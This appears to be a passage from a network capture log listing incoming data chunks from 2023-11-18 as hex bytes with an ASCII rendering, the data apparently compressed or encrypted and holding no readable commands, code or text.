2023-11-18 09:02:40 UTC	2976	IN	Data Raw: da a4 8a 40 99 a9 57 b5 95 b9 b4 5a 54 06 e7 47 c8 2f 5e 1b 36 3d 9a ce 30 51 65 8a e0 cb 09 c4 cf 4f c1 15 88 9b d8 d5 9c 20 b5 ab 54 c9 24 cc 31 49 c8 b1 17 2a 99 a4 a9 e4 c1 72 54 f2 bd af 88 92 d3 22 50 72 c1 8f da 4a 76 91 28 99 8c 90 92 05 48 59 6f 81 92 c9 a2 92 9b 3a 89 f8 13 f1 e6 44 e1 e6 67 4d 80 3f 51 bc b9 67 94 6e 2d ad 5a 43 34 1c 20 eb 3f 76 d0 69 87 08 94 fc b8 45 5b c9 a4 4f 44 25 6d 88 db 26 e0 fe 6b 0e 28 69 13 71 1f d2 7e bb c4 6b e1 be 8f e0 be 5a 42 70 57 45 80 bb e9 8a 36 ee 29 ab 44 dc b1 88 3b 56 c0 bd 33 1b 70 c7 8a b8 bb eb e0 f6 b8 cd d0 9e c3 16 bd dd fa 91 b2 7d 58 d9 53 de 3e 34 2c 93 37 7f ce d3 e6 8f b5 3b d7 3e 9c db 93 6f 1f 16 38 bd a4 c2 33 fa 18 9b 27 73 31 e3 34 7b 32 8b 19 a7 c5 93 b9 9c 71 c6 7a 32 57 30 4e 2e 7d Data Ascii: @WZTG/^6=0QeO T$1I*rT"PrJv(HYo:DgM?Qgn-ZC4 ?viE[OD%m&k(iq~kZBpWE6)D;V3p}XS>4,7;>o83's14{2qz2W0N.}
2023-11-18 09:02:40 UTC	2992	IN	Data Raw: 5f 40 e3 78 0d 91 f0 5a 1e 8c d7 48 c0 6b 20 bb ea 5e 58 2f cd 79 a3 6b 0a 26 8f d4 ff ef 3d 38 58 8e 60 97 4f f4 e0 72 a0 dc 87 0d 43 e1 46 0f 04 28 54 63 d5 6a 7d 24 a9 38 6b bc fa f0 3c 56 fc bf 3a 77 6c 02 17 40 42 e0 7c 5f 20 c0 61 c5 99 5d c2 1a a1 5c 2e ac c7 ab 8d 83 be c9 d0 77 bd 65 d0 76 a7 27 a7 13 8d 81 0f 9f 6d 0c fc 95 e0 81 8f 99 02 c5 d4 d4 a1 01 74 7b 0e 42 f3 eb 54 d8 1e d0 99 e9 d3 7b b0 38 03 16 15 75 31 2e b8 1f bf bc b9 86 17 f2 9a c0 0b 9f 8e 35 57 f4 f2 25 5f e6 19 6e 29 97 79 49 94 09 f0 97 45 90 7d a9 58 85 2a 15 eb 38 8d 29 52 05 ff aa 16 fe 1d 37 cb 9e 7f 13 d8 88 a2 2b 68 44 ef 12 ff 9e 7b 02 83 b8 99 13 87 16 93 ab da 03 1a 63 ed d0 98 87 68 cc 23 34 9a 05 1a cd 16 34 be 48 09 af ca 38 1a 3b f9 15 1b 88 c6 3c 13 1a 99 50 46 Data Ascii: _@xZHk ^X/yk&=8X`OrCF(Tcj}$8k<V:wl@B\|_ a]\.wev'mt{BT{8u1.5W%_n)yIE}X*8)R7+hD{ch#44H8;<PF
2023-11-18 09:02:40 UTC	3008	IN	Data Raw: dd 6f 9e 39 7e 01 32 ee b1 e3 bc f0 a1 5c d4 2d c8 dc 60 74 0c f4 6c 0c aa ca 4d 1f 5a c9 e8 a6 0f e5 32 e2 30 09 08 33 07 60 da 3f b0 d2 58 fb 07 72 8d b5 c4 18 ef c9 fc 1e 60 36 7c 10 a4 a2 36 c3 6c 10 60 6e 8c 32 c2 f0 0b 32 27 de 23 30 53 3f a0 6b 2a f8 7b 6c 27 ea 8a 6a ee ab 4e 1e c2 0f 62 15 84 ae d4 df 7a 91 60 53 3c a8 fc a7 b5 72 b4 5c ae 95 2e 64 20 15 19 48 05 06 d6 94 5b 69 65 4d b9 5c 2b 1c e6 3a 84 f9 be 8c c0 4c 2a b7 d2 ca a4 72 b9 56 ba 62 8c 37 6b 56 03 cc c5 e5 56 5a b9 b8 5c ae 15 0e 73 3d c2 dc 0b 30 7b de d7 b4 f2 fe cf 7a ad a4 9d 96 6b e5 26 51 2b 19 c7 e2 8d e7 ac b8 23 a1 5a a9 a1 5a a9 a6 73 4c a5 5e 37 7a d7 79 70 7b 33 b3 71 c7 fb 72 dd 24 0e 64 6c dc 81 6c 14 6f 20 6c 84 bf 0f d2 70 4b 60 c2 df 97 eb 86 c3 dc 89 30 b7 03 4c Data Ascii: o9~2\-`tlMZ203`?Xr`6\|6l`n22'#0S?k{l'jNbz`S<r\.d H[ieM\+:LrVb7kVVZ\s=0{zk&Q+#ZZsL^7zyp{3qr$dllo lpK`0L
2023-11-18 09:02:40 UTC	3024	IN	Data Raw: bb cd f0 06 85 f5 6d 23 dd 92 19 3e 99 cb 3a 98 a7 64 88 05 68 7f 57 3e 8a a1 55 ec f6 67 51 95 68 2b 77 13 3e 55 43 60 a0 83 32 64 2a f7 3c 6a 2f f3 b1 ab a9 a5 4b e9 d7 9c 46 fb 73 b5 fc 94 d0 b3 08 9b a6 65 9d 33 b0 5c 3e 96 cb cf 69 7c 26 cb 98 76 5e 8d e9 85 98 5e 98 d3 f8 34 43 29 89 c5 f4 40 b1 a3 7b 23 5f 40 bf 7e cd dd 51 2d 9d c0 42 61 cc 69 dc 3c 99 7e 3b 10 ed 5b 3a fd b6 17 0c 21 e9 fe a8 85 05 d0 64 91 50 bd 94 67 1e ba 39 49 02 8b 78 ed 63 9b f0 71 1e 7e 8c 80 47 00 ee cd 70 05 38 06 78 92 69 27 96 d1 fe fe 1e 31 f6 9f 6d 1b 0b 6a 87 36 4b 4e 1f 7b c1 f2 cf 6f 84 55 d8 79 44 58 ba 92 a4 73 9a 5c 31 55 1d b7 4d 37 3c 25 d9 e2 2d 48 a7 ba 6a e4 22 3f 2c f5 0d 18 72 cd 87 0b 7e bd ce 50 46 bd 35 cc 67 ab 90 ba ed 54 f4 55 ba 8c 09 a9 95 ec 81 Data Ascii: m#>:dhW>UgQh+w>UC`2d*<j/KFse3\>i\|&v^^4C)@{#_@~Q-Bai<~;[:!dPg9Ixcq~Gp8xi'1mj6KN{oUyDXs\1UM7<%-Hj"?,r~PF5gTU
2023-11-18 09:02:40 UTC	3040	IN	Data Raw: a4 3d 22 d4 85 8e e1 14 42 37 f3 0b 87 fd 28 0f 59 47 96 dc d9 a1 42 04 93 91 14 1b 13 e6 de c9 9e ee 0f 9c de a0 41 e1 81 22 06 b5 27 7d 69 99 11 7d e9 89 e1 2a 4c 84 cf 24 f8 a4 a0 4d 2b e9 0f 14 8c a9 ec dc 81 23 26 bf 2f 1b 31 75 c1 27 16 d4 a3 d4 c6 31 07 22 d2 24 41 a6 76 37 49 ec cb eb 51 c9 08 9e 73 c1 b6 80 f5 45 3f e2 a6 8d 4f 8e a9 a1 b4 75 fd 72 01 db e4 02 4c c3 65 86 5e 44 37 1b 0b 7e 08 10 46 0f 54 b2 63 0e c1 06 c2 b5 ea 94 85 ef 18 b4 c0 87 9d 2a bb 5e 80 52 df 38 0b fb 9a 4d 4f 69 41 7c 58 38 c4 9f 54 61 89 e7 58 e3 ca 39 45 1b 9b c3 2f 3a 87 f0 0b 0d 89 65 e7 31 f1 4e 23 91 51 60 6c cc 0e 97 8e f1 7c 46 e1 d7 a6 bf c0 ed 20 1f 38 17 e9 7e ca 51 14 e8 57 a4 45 86 d3 39 0c 7e ad eb 4d 0a 7e ad 4b 78 8f be ce 87 c2 df e6 d0 96 9e 83 16 53 Data Ascii: ="B7(YGBA"'}i}L$M+#&/1u'1"$Av7IQsE?OurLe^D7~FTc^R8MOiA\|X8TaX9E/:e1N#Q`l\|F 8~QWE9~M~KxS
2023-11-18 09:02:40 UTC	3056	IN	Data Raw: 77 4a 2f e7 f0 9d c0 87 ef e9 e1 63 7c c0 cd 30 b8 3b 6c 66 57 d5 c1 a7 d3 e4 e0 c5 ed f6 8f e0 06 d9 89 d5 c3 ff d1 c7 ce 9a 9c de b2 68 0e a5 43 5e f7 81 96 88 0e 54 2e 80 bc d5 76 ff 7a 78 ed ad b9 0a 05 84 c6 38 cc f7 ad 4f a7 71 88 6c b1 06 ea ef fd c0 be 26 a7 7f 28 53 d2 81 0a 14 e7 f4 60 f8 1a 63 d1 9b 31 90 25 47 54 4f f4 17 7d cf 44 6d e5 ad 74 c5 2a e8 ec 23 26 94 9b b6 c0 d6 39 19 7b 43 06 7a 0f f6 e8 a5 ed 5c 6a f6 8b 4f aa e8 06 ad 4f fa eb c7 59 49 7c 8a 95 ae 2d 9f 71 98 66 25 96 ac 4f d7 36 1c 1c cc 20 b9 64 7d 0f 45 e5 f0 10 99 e5 8d f1 e3 80 96 cb 89 69 53 69 02 74 c7 99 00 4f 2f 17 bb 8a 79 18 08 a7 07 9d 22 f9 aa 3d 26 1c 5f 3b 70 76 00 ce 00 c0 41 66 fd 45 c9 31 2c 71 6c ca 2d 99 01 af b4 6a be e7 69 33 b7 a3 1d a4 c6 02 a9 b7 30 bc Data Ascii: wJ/c\|0;lfWhC^T.vzx8Oql&(S`c1%GTO}Dmt*#&9{Cz\jOOYI\|-qf%O6 d}EiSitO/y"=&_;pvAfE1,ql-ji30
2023-11-18 09:02:40 UTC	3072	IN	Data Raw: 49 24 b1 b2 6f 3d 13 2b 17 68 62 e5 02 8b 58 99 71 32 ba 58 29 06 bd 86 0f fa e4 71 13 11 1f b6 83 5f b3 98 40 41 2e 9e d4 dc dd cd 96 32 1d 3f 87 3b cc f8 f9 c6 82 9f 75 bc ab ab db 19 7e 56 b1 ca 81 95 84 11 9c c4 86 bc aa 18 b2 5b d1 16 6a 0b 20 be 0a 70 23 15 1b 94 9d 9a 90 97 77 4b 97 ee 44 1b fa 1a cc 41 4d a2 12 40 2c 28 89 3d 8d e0 a1 b4 38 23 86 60 d8 f6 52 7f b4 b3 e1 5c 70 16 b0 11 41 34 74 89 eb 3b f0 24 ec 57 8a 66 77 fa 14 6b 29 5d fa 25 e5 6a 0d 9a 1c b6 4f f6 bc a5 aa e1 fc d7 87 fb a4 81 9b fd de f6 cb 38 65 65 67 18 27 be ce 66 e4 7c a3 cf 9a b8 65 d2 2f 84 3f 2d 1c fe 67 52 94 9d e4 af 52 64 f8 82 ef 75 5e 04 3d 4f 38 c0 e8 39 5b a3 e7 6c 0b 3d fb 8e 5f 1c 3d 1f e4 44 76 a5 62 a4 e7 90 cb 9a b5 49 ee b3 2c ba 44 b0 5f d6 f9 f6 e0 dc 0b Data Ascii: I$o=+hbXq2X)q_@A.2?;u~V[j p#wKDAM@,(=8#`R\pA4t;$Wfwk)]%jO8eeg'f\|e/?-gRRdu^=O89[l=_=DvbI,D_
2023-11-18 09:02:40 UTC	3088	IN	Data Raw: 17 e2 ff ee 42 15 2a 85 ea 85 f5 71 75 98 8e ab f0 3e 4f bd 42 fe 35 bf 8d e2 73 8a 46 50 ba 1e c2 df 44 67 87 19 87 d2 df 25 1c 0a c6 e1 50 6e 56 58 8b dd ca 70 0b b6 42 33 d0 17 f0 f2 1e 75 86 22 20 4c 4c ae 6b 6e d3 4c 28 0c 69 07 0a 3b 7a c7 43 61 ab 10 f2 ac 4d ad 1a 19 f3 a7 22 c6 fc b7 a3 c4 98 1f 95 28 8f 79 fc 34 e7 1f 9a d4 b1 ee bb 0d 65 44 86 72 12 dd 83 51 22 a4 8c ed 53 c7 a2 e8 67 98 ef 4f 19 dd a2 85 b2 63 a2 4d e5 99 0b b3 3e e5 6e 81 7d 49 67 03 2d 10 81 3c af 19 d9 22 1f b5 00 f9 54 78 ea 3c 59 d6 df 2c bc 52 12 49 a6 fc c3 97 4d 6a 6b 46 61 7b 3d 6b c4 cc 66 da 25 c2 2d 50 30 d2 28 c8 af 13 d6 3a b2 6b 09 6b e7 50 41 de 79 87 2e c8 7f 18 89 3c 8d 19 e0 7b ad 09 d8 7a 13 b0 b9 14 d8 33 00 ac 29 37 ac c9 8a 11 e2 b4 22 55 6d 97 5c 3a 84 Data Ascii: B*qu>OB5sFPDg%PnVXpB3u" LLknL(i;zCaM"(y4eDrQ"SgOcM>n}Ig-<"Tx<Y,RIMjkFa{=kf%-P0(:kkPAy.<{z3)7"Um\:
2023-11-18 09:02:40 UTC	3104	IN	Data Raw: 0c 14 ee 20 4f 32 8a 65 53 2f 43 cb ce c0 54 a1 b9 a3 83 d3 da 20 98 36 50 58 57 6b d3 1f a4 7a 47 fd 6e 98 f1 b5 fb 41 d2 c9 22 7f 47 6d da 2d ed dc cc 3e 8a 52 87 9c 89 fa 36 6f 76 30 8a 7d 74 2c b1 fc dc a3 70 cb f5 03 8e e2 11 fd 53 9f 60 2e 0d aa 77 df 20 98 4b 3f 30 a0 d6 ef d3 b5 b9 b3 ad d1 62 19 5c ea c4 33 dc 8e cf 47 5c ee 53 d7 cf d9 ec 95 a5 1a 96 db dc 59 5c 0f 15 b4 16 9e fd ee a3 76 67 0d 26 cc 75 b7 f7 0f db 43 b9 73 c5 a3 4b 1a de 4b d8 e3 65 3c 60 eb 65 7e 99 39 9e f2 1a 56 97 e0 3b b7 b4 44 3f 00 95 54 ae f3 92 99 13 2c 0a 4b 9e bb 8d 39 c2 e6 d3 11 91 c1 8f 08 47 e4 15 ea 87 c7 65 b3 82 bd e5 73 c1 47 8d 19 96 07 97 60 5a 30 82 17 1e c1 83 2b 97 b6 85 a5 bb 8c 06 5c cc 31 7b cd 42 30 e0 f2 39 a4 8b fe c8 c3 b2 c2 72 ca a6 ab 72 78 9a Data Ascii: O2eS/CT 6PXWkzGnA"Gm->R6ov0}t,pS`.w K?0b\3G\SY\vg&uCsKKe<`e~9V;D?T,K9GesG`Z0+\1{B09rrx
2023-11-18 09:02:40 UTC	3120	IN	Data Raw: 18 1f 3c 04 b1 9e 3c e7 d0 f5 b6 61 2d a6 ad 3f 02 24 7d 61 8c 87 a2 c9 af 74 c5 1c 84 a3 0f c2 f9 a0 c5 e6 9f d4 26 7e 03 4e 41 77 63 66 7a 5b ba d2 ea 2b c7 cc 8c 01 ba fb 7d f0 f3 3c eb 52 89 c4 88 98 6a 70 8f c2 3b 99 59 90 2d 33 37 94 5b dd c5 6e 22 fa a0 b9 66 0f 01 66 77 9e dd 16 b7 0e 8f fb b9 d5 9f ba 39 68 ac 27 1c ea e7 e9 94 a2 85 f2 72 07 de 05 55 1c 83 ed e1 ea 23 e0 52 ae 36 f4 d0 96 23 ba 54 2d 26 4f 8f cf 42 b9 29 90 2c e6 70 83 45 3b cb b5 29 2f 55 4c a9 91 3d 4b ef c5 e8 84 79 37 cd 10 f4 7b 3b 60 07 cd da c1 9d 61 bb bf a8 08 ee 7f 58 8b 59 ff 9e b6 71 e3 17 87 f4 e8 af a8 54 a1 6b 73 bd 99 71 5c ae 53 66 ee d5 41 99 73 16 87 74 a9 17 6a 5b 48 7e 1f 1b 50 a1 f8 8f 78 2e a9 4d b4 61 ec cf 85 8f be 14 42 27 2d 93 ea 8d 5e cb 6c 72 63 ba Data Ascii: <<a-?$}at&~NAwcfz[+}<Rjp;Y-37[n"ffw9h'rU#R6#T-&OB),pE;)/UL=Ky7{;`aXYqTksq\SfAstj[H~Px.MaB'-^lrc
2023-11-18 09:02:40 UTC	3136	IN	Data Raw: b1 64 1f ef 64 92 05 62 ea 7c b4 e6 c0 ef a3 8b 10 e2 f6 b0 ac b3 ec d9 ef 2c 34 1e 7e 2a 06 8d 51 da 1e 0e 08 24 2a 7b 02 54 49 b2 d7 ad ef 5d 3b a7 01 a1 17 29 81 c9 39 f3 62 db 47 e6 5c 13 d6 22 57 11 e9 40 a4 6f e1 77 9a 26 92 37 e6 29 43 04 88 d1 85 01 20 94 6c 82 03 ac 9c 44 01 dd 21 cd aa 43 69 df 29 66 43 05 13 3a a0 62 34 e2 99 ab 30 59 69 c4 63 57 61 8a d2 b8 49 13 93 a0 ea b0 a5 75 f4 df 21 93 b7 50 83 c9 85 e8 08 fd d7 42 ff b5 d2 7f ed 43 40 99 31 98 b3 1e 41 55 29 ee cf 44 86 0c c6 59 e0 38 f0 f4 45 11 39 e8 71 ec 00 1e c7 1a d7 e3 6d 3c ba 0d a7 a1 e6 5b c1 cf 84 ba ee 46 6f 3c 63 e6 9a f9 ea da 19 94 af f2 d9 b0 95 30 be 5a 33 87 f0 d5 c7 59 90 d2 14 3a c8 f9 e4 52 7a 40 85 8c cd 47 66 40 86 67 2d d8 26 97 a5 92 cb d0 1f b0 15 65 53 e1 fa Data Ascii: ddb\|,4~Q${TI];)9bG\"W@ow&7)C lD!Ci)fC:b40YicWaIu!PBC@1AU)DY8E9qm<[Fo<c0Z3Y:Rz@Gf@g-&eS
2023-11-18 09:02:40 UTC	3152	IN	Data Raw: f0 03 17 00 97 09 37 c8 f8 13 77 10 0c d5 e7 0a a3 bd 22 0d ef d9 83 2b 5f 8a 06 03 48 7b e7 1a 12 40 48 eb e2 e1 4b cb 08 65 db 75 1e c4 fe f5 04 45 88 48 24 ff 95 6f e6 c3 be 74 a2 bd 27 1e 5d 0f 25 71 21 c3 e6 1f 4a ee dc 12 89 19 f6 6d 60 56 ec 49 1c 1f 12 92 43 45 fb 18 45 47 42 d1 f6 a4 51 d0 2e b2 bb 27 85 dd 85 96 66 9e d4 d5 ab 06 f4 4a 92 82 2e f3 14 bb 5b 03 7f 34 08 90 dd f5 ca 02 b5 7e b1 62 77 6b 65 91 79 ff a8 b1 03 58 14 e4 ea 4c 16 98 4a 14 18 f3 62 d9 e1 95 a3 60 79 18 b9 59 b5 58 95 9b 65 24 37 89 b3 39 1f 5e 22 56 f9 16 32 b9 c9 5a 0c 72 b3 5c 44 b1 80 18 67 e6 b9 28 14 ab 15 8e af c6 c1 b9 2b eb bf 64 fe 29 99 0d 33 0a db 12 1f 0f 52 8f 08 50 4c bc b4 c9 3b ff 35 b8 26 31 bd 17 24 a9 23 0e 86 62 3c d4 85 61 6c c4 f4 06 77 3a d6 3b d0 Data Ascii: 7w"+_H{@HKeuEH$ot']%q!Jm`VICEEGBQ.'fJ.[4~bwkeyXLJb`yYXe$79^"V2Zr\Dg(+d)3RPL;5&1$#b<alw:;
2023-11-18 09:02:40 UTC	3168	IN	Data Raw: e6 e2 83 a2 82 e0 9c 1c 7f 0e 2a 70 77 c3 1c 81 52 b6 df 48 14 db 07 ca 27 e6 9e 52 e8 24 db 5d 20 e3 0f ef ed 56 38 42 cf 9c 46 35 e2 72 db 68 d0 78 e8 5f 71 98 11 3b 3c ff ba c5 13 75 3d cc 33 64 c0 56 24 09 37 bb 14 c2 ff 4a 8f 2d df 70 da 6f 94 e1 46 03 1e ff cb 37 9c 27 33 9d 52 ad 12 cf c5 d0 f7 72 df 79 a5 2e a5 c0 bc ab b4 df a4 5a b2 c7 41 59 3f 91 7c fa 05 cc 94 51 1c ad ed 5e 39 6c db ca ff d1 d9 63 2f fc 33 42 4b 38 fe 9d 82 e7 fd df 85 ab f9 27 e0 aa 0c cf 3e fb ed 8d 7b 5c 96 03 c6 2f db 79 87 c7 78 49 15 17 90 2a b6 7e 27 9b e3 97 56 91 17 e0 62 0d 21 aa 8d 72 fc 3f 65 4f 1f 17 65 95 f5 0c 0e 81 cb e8 50 b2 e6 1a 16 99 16 ae 59 ba 66 1f 7e bc d2 9b 93 bd 96 65 fd 60 33 53 53 f3 2d b6 a8 cc 66 14 4d 74 08 30 68 40 29 a5 a8 ac c5 b2 1c 15 75 Data Ascii: pwRH'R$] V8BF5rhx_q;<u=3dV$7J-poF7'3Rry.ZAY?\|Q^9lc/3BK8'>{\/yxI~'Vb!r?eOePYf~e`3SS-fMt0h@)u
2023-11-18 09:02:40 UTC	3184	IN	Data Raw: ce 85 56 4e 11 24 0d ac 32 93 34 2f 8c a4 01 4e d2 e5 40 92 77 15 9e e0 a1 6a 12 a3 bc bc af b1 9a f2 e0 68 8f bf 04 62 96 ef 44 9f 0e 37 80 41 f0 4b d9 6e b8 96 e1 5a 1e 46 9f 46 6d 9e ae 12 31 c3 db f2 3c 43 59 0f 65 12 31 cb 72 e0 c8 49 1b 55 48 0d ab 90 9a 0c a6 03 6a 68 4a b1 95 0f 51 7d 45 b4 d9 de 33 75 d4 88 c5 c6 24 a7 da f0 94 95 0f 74 7d 29 de 25 1b 4f 5a 8c 0a 20 f6 1a 36 24 d9 2c 81 17 86 d1 9d e5 7a 52 31 d4 e2 7c a2 61 3e a6 02 91 58 b5 5d b1 f2 0c 33 91 b8 65 73 84 26 77 cc 3a 3b 31 c0 49 c4 8a 6a ee 71 d6 62 1f ec e4 91 ac 96 6a 45 2d a1 df 74 2f 3e 65 6f dd d6 24 9b 45 f7 d6 dd 83 c9 c4 9e 5a c6 9e da 0c 67 73 f9 8b 7c ae 8f be 1c e9 a7 a7 b3 a1 63 6e 11 2e be 8b 48 90 2a c0 6f c4 bc 6c 21 48 92 04 b5 73 7f d2 41 cd 24 41 75 ba 04 f5 f1 Data Ascii: VN$24/N@wjhbD7AKnZFFm1<CYe1rIUHjhJQ}E3u$t})%OZ 6$,zR1\|a>X]3es&w:;1IjqbjE-t/>eo$EZgs\|cn.H*ol!HsA$Au
2023-11-18 09:02:40 UTC	3200	IN	Data Raw: c0 8a 75 bc a2 e0 08 e6 79 26 08 6d 17 e7 99 00 4e 29 55 8d b0 7b a5 a2 46 08 e0 fa 52 25 e4 9f c7 29 12 32 9a 24 55 e1 34 f3 ef 20 9c 82 2c 33 63 96 b8 c4 d9 13 7d db 2d 5e e2 5c 8b 97 38 d7 a8 9a b6 26 6e d5 d9 87 86 b9 e8 fd 3a f3 59 eb 7e 5d cb 69 99 34 b4 07 65 31 a4 fd fa 8f 01 b6 5f 27 3f db 8a a0 62 ee fc 3d 6d 90 3e b4 41 3a 45 90 ee 01 48 ef 57 d2 c8 c7 82 54 57 69 85 f4 89 0d d2 57 04 29 0e 20 e5 57 b6 52 f7 e8 30 7d 66 06 6c 5d cd 92 41 c3 20 65 b8 94 bb 69 97 5c 46 b1 4c 41 70 ee 65 22 6c 46 bc 38 13 64 35 ab 8a 85 76 9a 57 39 3d ba 77 21 df fa a8 44 9f 55 83 de 66 3c 20 18 ae df 67 cb dd 9f 55 2f d5 ae 87 60 d4 9b bc 45 4d 5a c1 8d fc ba 5b c4 92 f6 ed 8f 63 99 c4 b0 44 ee c4 0d 08 04 1d f8 31 38 92 f0 ee 6d df 42 ca cd 5f 7e 07 3b 2f c2 9a Data Ascii: uy&mN)U{FR%)2$U4 ,3c}-^\8&n:Y~]i4e1_'?b=m>A:EHWTWiW) WR0}fl]A ei\FLApe"lF8d5vW9=w!DUf< gU/`EMZ[cD18mB_~;/
2023-11-18 09:02:40 UTC	3216	IN	Data Raw: 06 f0 59 36 28 cf 88 44 7f f8 21 40 97 12 47 9a e7 6e 91 e8 aa 08 55 0e 02 7e e4 5d 4e 0f 64 c2 e3 f8 70 d4 c0 03 e3 bb 59 be 86 96 87 e3 3f 67 72 89 5d e4 75 b9 a5 9f 73 ba 9c 86 d0 49 a3 b9 fb 9e ea 76 61 79 91 c1 7e e1 84 1b 8e 45 44 71 4f ce 29 94 8c cf c9 61 1c 18 21 9b 22 10 f2 9d 0f 61 09 14 65 19 6a cb bf cb 24 08 5d 52 f6 cb f3 c6 94 f5 b1 16 fe c5 28 7b 43 1b a1 ec ab e7 39 d0 28 69 e5 6d 4b fb 17 38 0f e5 4f 20 9a d5 28 83 7a 1d 8a 9d bf 1d fc 5e 62 79 de f1 71 bd 47 55 5b 0e 74 a3 9f 0d f5 7e 49 af 44 31 50 bf d7 42 1e fd 0b 21 af ac f7 2b 01 f6 ed 3e 38 04 ce b0 07 6d c5 43 40 ad d1 8a ee db 46 19 85 1b 43 f7 1b d6 ce 95 08 ed 98 d5 76 da 3b d4 70 8d ed c7 d8 58 dc 94 bc 16 7b c4 94 af 78 5a 35 0a 77 22 57 68 ae fa 5b ba 2e 92 c6 8a bc 69 35 Data Ascii: Y6(D!@GnU~]NdpY?gr]usIvay~EDqO)a!"aej$]R({C9(imK8O (z^byqGU[t~ID1PB!+>8mC@FCv;pX{xZ5w"Wh[.i5
2023-11-18 09:02:40 UTC	3232	IN	Data Raw: 26 c3 3d e3 f0 12 3c b3 9c 41 fe bf 63 06 9d 61 16 5b a4 bb 8c b4 71 a0 d2 d9 aa e3 cd b3 19 9b 6a 53 6e ae 73 57 b5 0b 2e 74 d3 ad 94 f7 8f 7e a3 a9 b8 8c a1 37 f5 f6 58 d4 1e e5 4d 35 61 53 41 c5 4b 5c 73 7e bb 60 6d 37 dd 4a 79 f7 2a 4d 25 0d a3 a9 3b b0 a9 20 77 5d d4 ea ae 7f da 1e ea ef 26 c1 5f 1b 3c 03 d2 20 e3 83 c7 a6 51 e2 ad 04 74 04 7d e5 d9 6b e0 4d 15 12 05 e0 3a 1a 12 85 a6 69 3d f5 a8 71 df 58 63 25 f9 4a c3 80 2a 4d 09 15 dc 00 cc 7f 13 88 ff dc cd 03 42 52 d0 22 53 3e 99 f2 cb 54 ab 4c b5 c9 54 50 a6 42 32 d5 2d 53 3d 32 75 4a a6 fa 64 aa 5f a6 2c 52 56 61 93 29 bb 4c 39 64 ca 29 53 49 94 0a d5 6c d5 59 47 d2 d8 cf d0 d6 eb a1 4f 29 90 9c de c0 16 a4 7b 06 38 ee c3 ee 89 3b c8 a5 6c 92 3c 98 0f d3 77 dd df d9 26 ec 6e 51 ca f7 5c a3 96 Data Ascii: &=<Aca[qjSnsW.t~7XM5aSAK\s~`m7JyM%; w]&_< Qt}kM:i=qXc%JMBR"S>TLTPB2-S=2uJd_,RVa)L9d)SIlYGO){8;l<w&nQ\
2023-11-18 09:02:40 UTC	3248	IN	Data Raw: f7 4a 12 32 b5 2a 08 2d 5c 8b 27 9f c1 6b 0e 71 d6 3d 3b 62 cd 5a d1 56 94 1d 45 81 7c bb fe b3 eb 00 7f 8b 42 be 5f e5 a1 91 56 9e d5 73 21 17 55 52 43 87 38 d8 70 9c f9 7b 79 99 91 f9 7b 91 be 0d e0 61 c1 8f a8 9f fd 10 4f b2 a5 55 f0 12 08 f3 88 55 fa 59 36 79 95 7e 96 75 fe b0 97 f7 fc cb 73 dc 71 82 60 d1 0f d8 01 17 9f f7 8d 6a 32 ea bf 66 99 70 ae 51 a8 e2 44 fa 9c 6e ad ef d9 a2 27 66 8d c3 45 b5 17 bf 89 ee 1e 97 9f 31 1c 23 93 a9 93 96 0d 86 28 72 f5 d7 5d dc cb 86 c8 19 3e 31 00 fd cc 73 61 96 df 9b 4c 20 0d dd bf 03 5c 48 fc a6 17 0d 56 07 73 80 75 0f c5 bc df 3a 4f 7d e7 03 d1 bd af 26 3c 10 dd fb ea 58 43 4c 4b 1f f8 fc 6b 48 57 03 9d 8a c0 79 f3 fc df 35 7e 63 0c ce 94 d7 10 9b 5b b0 99 b9 85 3b 62 7c a0 d8 3e 51 d5 88 5f 5d d6 10 4b 5e 78 Data Ascii: J2*-\'kq=;bZVE\|B_Vs!URC8p{y{aOUUY6y~usq`j2fpQDn'fE1#(r]>1saL \HVsu:O}&<XCLKkHWy5~c[;b\|>Q_]K^x
2023-11-18 09:02:40 UTC	3264	IN	Data Raw: 6e c5 9b ea 75 ae 6e 66 90 ba f9 df 22 ff c7 87 6c 75 5e be 3b a4 8b 9a 08 9b 3f 09 51 dd 6e 12 64 d4 26 92 3d 86 1e 80 b7 cd 33 f7 84 b0 0c 43 7b e4 56 7e a6 b7 a7 ea 03 37 88 72 7f 66 16 e8 98 0d 5e c7 32 37 ff 5a ef 75 2c 3f 50 1e 1d 79 e7 3b 59 ba c6 2d 6f e3 d9 c2 22 38 54 f7 91 cc a1 c1 c4 a1 85 c4 a1 1c e2 50 6c 03 e3 50 16 38 65 d1 d5 63 23 82 2c c0 e8 3e b1 dc cd fa 59 be 18 8b 89 3e e5 6c 02 88 d4 18 05 a9 8b 09 29 7f 99 5c ab 2e bd 9e 21 15 de e5 74 b8 0b ef b2 1f 7d 01 a6 88 c0 5c 01 60 ca 59 63 47 2e 2d db 65 cf 25 01 e9 55 82 14 da c9 20 dd bf cb c6 a8 30 31 ce 08 a5 98 dc 65 aa d9 13 68 a2 8d c6 9f 8d f4 20 97 8a 8e 47 ee 0a 19 66 df 95 64 17 8c 31 e7 e7 b5 ff e8 c0 ae 40 36 33 10 7b 4b f2 90 07 3a 94 e5 70 4e df 53 b9 a7 34 92 20 06 6c 58 Data Ascii: nunf"lu^;?Qnd&=3C{V~7rf^27Zu,?Py;Y-o"8TPlP8ec#,>Y>l)\.!t}\`YcG.-e%U 01eh Gfd1@63{K:pNS4 lX
2023-11-18 09:02:40 UTC	3280	IN	Data Raw: c0 7f 64 8b 70 b7 12 71 8c 66 db 43 89 1e 09 23 df 06 9a 72 0f 60 b0 fb 40 d3 ab 6e ee 62 d0 33 a7 a3 9b 65 65 db b7 38 ab 0a d8 ac 72 60 0a ee ad 98 dc 3a ef 4b 1c 0c 04 72 91 01 81 a0 16 f5 18 d4 22 a7 3d 08 86 98 58 78 01 9f 79 62 b5 49 33 3d d2 3a d4 2d 0a 50 68 cd 57 20 7c 9d e4 91 72 3a fa 3d fb 1c 7d 7f 61 8e 47 82 fc d3 0e cc 3f ed c4 fc d3 2e cc 3f dd 8e 06 7e 0f 1b 60 d4 0c e7 53 83 09 c9 bc 81 1d 1b 54 62 83 6a 6c 50 83 09 ab 6b 31 61 75 1d 26 ac ae c7 84 d5 8d 6c 72 18 78 14 6b 26 0c 92 be 83 62 e1 6e b6 c6 77 4f 37 17 99 0a 8e c3 cb 4f de 61 cb 20 e8 90 26 1c 63 2e 20 2e 5e f9 b5 24 cc 9a df 16 38 e1 ac 1a 6c 2a 65 fa 43 a9 bd 4a 15 35 70 d7 42 28 e2 33 c2 21 8c 68 90 8e 9e e2 72 b3 51 75 ca 51 dd b0 59 58 8d b6 99 5e 60 a4 03 d0 ec 03 85 a2 Data Ascii: dpqfC#r`@nb3ee8r`:Kr"=XxybI3=:-PhW 